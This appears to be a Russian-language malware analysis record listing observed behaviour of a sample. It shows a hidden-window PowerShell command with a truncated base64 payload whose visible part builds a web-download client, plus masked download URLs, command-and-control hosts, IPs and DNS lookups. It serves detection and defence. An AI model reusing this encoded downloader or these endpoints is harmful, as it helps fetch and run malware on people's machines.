Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADIAXwBfADAANgBfAD0AKAAnAEsANwBfACcAKwAnADkAOQAyADUAJwApADsAJAB3ADYAXwBfADkAOABfADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA1ADEAOQA2ADIAOAA9ACgAJwBoAC...
- 'ev###cherry.com':80
- 'th####ellabel.com':80
- '12#.#99.172.4':80
- '20#.#54.223.104':80
- http://ev###cherry.com/EPRpYDL
- http://th####ellabel.com/QByaBRWa
- http://12#.#99.172.4/J1EuGgi0sx
- DNS ASK rh###twork.com
- DNS ASK ev###cherry.com
- DNS ASK th####ellabel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADIAXwBfADAANgBfAD0AKAAnAEsANwBfACcAKwAnADkAOQAyADUAJwApADsAJAB3ADYAXwBfADkAOABfADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA1ADEAOQA2ADIAOAA9ACgAJwBoAC...' (со скрытым окном)